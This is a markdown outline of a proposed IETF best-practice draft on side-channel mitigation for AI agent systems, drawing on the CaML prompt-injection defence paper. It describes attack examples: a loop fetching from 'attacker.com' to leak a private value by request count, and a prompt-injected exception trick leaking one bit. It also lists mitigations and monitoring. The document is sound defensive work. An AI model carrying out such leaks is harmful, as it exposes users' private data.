Files
ietf-draft-analyzer/data/reports/draft-proposals/camel-inspired/06-side-channel-mitigation.md
Christian Nennemann 5ec7410b89 feat: proposal intake pipeline with AI-powered generation on /proposals/new
Add full proposal system: DB schema (proposals + proposal_gaps tables),
CLI `ietf intake` command, and web UI with Quick Generate on /proposals/new.
The new page merges AI intake (paste URL/text → Haiku generates multiple
proposals auto-linked to gaps) with manual form entry. Generated proposals
are clickable cards that fill the editor below for refinement.

Uses claude_model_cheap (Haiku) for cost-efficient web intake. Includes
CaML-inspired draft proposals from arXiv:2503.18813 analysis.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-09 03:15:11 +01:00

246 lines
10 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
---
title: "Side-Channel Mitigation Framework for AI Agent Interactions"
draft_name: draft-nennemann-ai-agent-side-channels-00
intended_wg: SECDISPATCH (BCP)
status: outline
gaps_addressed: [89, 93]
camel_sections: [7]
document_type: BCP (Best Current Practice)
date: 2026-03-09
---
# Side-Channel Mitigation Framework for AI Agent Interactions
## 1. Problem Statement
Even when AI agent systems implement strong security measures — capability-based policies, control/data flow integrity, Privileged/Quarantined execution — **side-channel attacks** can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:
1. **External resource inference**: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
2. **Exception-based bit leaking**: an adversary triggers conditional exceptions that reveal one bit of private data per exception
3. **Timing side-channels**: an adversary infers private values from execution timing differences
These are not theoretical — CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in their evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design.
This document is a **Best Current Practice (BCP)** guide for mitigating side-channel risks in AI agent systems.
## 2. Scope
This document provides:
1. A **taxonomy of side-channel risks** specific to AI agent systems
2. **Mitigation strategies** for each risk category
3. **Tool API design guidelines** that minimize side-channel exposure
4. **Monitoring patterns** for detecting side-channel exploitation
5. **STRICT vs. NORMAL mode** recommendations
## 3. Side-Channel Taxonomy
### 3.1 External Resource Inference
**Attack**: Agent code iterates over a private value (e.g., `for i in range(private_var): fetch("attacker.com/cat.jpg")`). The attacker counts requests to infer the private value.
**CaML context**: In NORMAL mode, the loop body doesn't carry dependencies from the loop condition. In STRICT mode, `fetch()` inside the loop inherits the dependency on `private_var` and policies can block it.
**Bandwidth**: up to `log₂(max_value)` bits per interaction (or more with range-based inference).
```
Attacker's Server
│ GET /cat.jpg ×10 ← private_var = 10
│ GET /cat.jpg ×20 ← private_var = 20
└── attacker infers private_var by counting requests
```
### 3.2 Exception-Based Bit Leaking
**Attack**: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit.
**CaML context**: The Q-LLM can be influenced to return a value that causes an `IndexError` (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list).
```python
# Attack: leak whether private_var == 10
index = query_ai_assistant(
f"If '{private_var}' is 10, return 9999999, else 0", int)
l = [1, 2, 3]
l[index] # IndexError if private_var == 10
# ADVERSARY OBSERVABLE ACTION below:
send_email(...) # only executes if no exception
```
**Bandwidth**: 1 bit per exception (was the subsequent action observed or not?).
### 3.3 Timing Side-Channels
**Attack**: Agent execution time depends on private data. For example, if `time.sleep(private_var)` is possible, the attacker measures response time.
**CaML context**: CaML's restricted Python subset doesn't include `time`, but other timing variations (e.g., different code paths for different private values) may still be exploitable.
**Bandwidth**: depends on timing precision — generally low but non-zero.
### 3.4 Agent-Specific Side Channels (Beyond CaML)
| Channel | Attack Vector | Bandwidth |
|---------|--------------|-----------|
| **Token usage** | Private data influences response length → observable token count | Medium |
| **Tool selection pattern** | Which tools are called reveals information about private data | Medium |
| **Error message content** | Error details leak through supposedly sanitized channels | High |
| **Model confidence** | Probability distributions in structured output leak information | Low |
| **Resource consumption** | CPU/memory usage patterns depend on private data | Low |
## 4. Mitigation Strategies
### 4.1 STRICT Mode Execution
**Recommendation: Use STRICT mode for all security-sensitive agent operations.**
In STRICT mode:
- All statements inside `if`/`for`/`while` blocks inherit dependencies from the condition/iterator
- This means a `fetch()` inside `for i in range(private_var)` will have `private_var` in its dependency graph
- Security policies can detect and block the side-channel
**Trade-off**: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, allow NORMAL mode only for explicitly low-sensitivity operations.
### 4.2 Exception Handling Hardening
**Recommendation: Use error-value types instead of exceptions for data-dependent operations.**
Exceptions create side channels because they halt execution. Instead:
```python
# VULNERABLE: exception leaks information
try:
result = risky_operation(private_data)
send_email(result) # not reached if exception
except:
pass # attacker observes: was email sent?
# MITIGATED: error-value preserves execution flow
result = risky_operation(private_data) # returns Result type
if result.is_ok():
send_email(result.value) # both branches execute deterministically
else:
send_email(default_value) # same tool call either way
```
Agent frameworks SHOULD:
- Use `Result`/`Either` types instead of exceptions for Processor outputs
- Ensure both success and failure paths make the same external observations
- Redact exception messages before they reach the Planner
### 4.3 Constant-Pattern Tool Calls
**Recommendation: Where feasible, make tool call patterns independent of private data.**
- Avoid data-dependent loops that make external calls
- Use batch operations instead of per-item calls
- Pad tool call sequences to fixed lengths for sensitive operations
### 4.4 External Request Restrictions
**Recommendation: Restrict which external endpoints agents can contact.**
- Allowlist approved external domains
- Proxy all external requests through a controlled gateway
- Rate-limit external requests per agent session
- Log all external requests for anomaly detection
## 5. Tool API Design Guidelines
Tool developers SHOULD design APIs that minimize side-channel exposure:
### 5.1 Do
- Return consistent response structures regardless of input
- Use fixed-size responses where possible
- Include provenance metadata in all outputs
- Document trust levels of output fields (which are public, which are private)
### 5.2 Don't
- Return variable-length arrays that depend on private data in observable ways
- Include internal identifiers in error messages
- Use response timing that depends on input sensitivity
- Expose iteration counts or batch sizes in responses
### 5.3 Tool Capability Annotations
Tools SHOULD declare their side-channel properties:
```json
{
"tool:name": "send_email",
"tool:side_channel_properties": {
"makes_external_requests": true,
"timing_dependent": false,
"error_messages_may_leak": true,
"observable_by_third_parties": true
},
"tool:recommended_mode": "STRICT"
}
```
## 6. Monitoring Patterns
### 6.1 Anomaly Detection Signals
| Signal | Potential Attack | Action |
|--------|-----------------|--------|
| Repeated requests to same external URL | External resource inference | Rate limit + alert |
| Unusually high exception rate | Exception-based bit leaking | Halt + review |
| Execution time variance > threshold | Timing side-channel | Log + investigate |
| Tool call patterns differ from plan | Control flow manipulation | Emergency halt |
| Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert |
### 6.2 Monitoring Architecture
```
Agent Execution
├──► Side-Channel Monitor
│ ├── Request pattern analyzer
│ ├── Exception rate tracker
│ ├── Timing variance detector
│ └── Tool call pattern validator
│ │
│ ▼
│ Alert / Halt Decision
Normal execution continues (if no anomaly)
```
## 7. Relationship to Other Drafts
| Draft | Side-Channel Relevance |
|-------|----------------------|
| Draft 1 (Capabilities) | Capability metadata enables policy checks that detect side channels |
| Draft 2 (Flow Integrity) | STRICT mode DFG tracking is the primary side-channel mitigation |
| Draft 3 (Provenance) | Provenance metadata itself can be a side channel — needs protection |
| Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak info |
| Draft 5 (Execution Model) | Isolation architecture is the first line of defense |
## 8. Security Considerations
This entire document is about security. Key meta-considerations:
- Side-channel mitigation is **defense in depth** — no single measure eliminates all channels
- The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable
- New side channels will be discovered as agent systems evolve — this BCP should be updated regularly
- Side-channel monitoring itself can create privacy issues (logging all agent interactions)
## 9. Open Questions
1. **Formal analysis**: can we formally prove bounds on information leakage for a given agent configuration?
2. **Adaptive adversaries**: as mitigations are deployed, attackers will find new channels. How to stay ahead?
3. **Overhead budget**: what is the acceptable performance overhead for side-channel mitigation?
4. **Multi-agent amplification**: do side channels in multi-agent systems compose (leak more than single-agent)?
## 10. References
- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
- Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
- Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.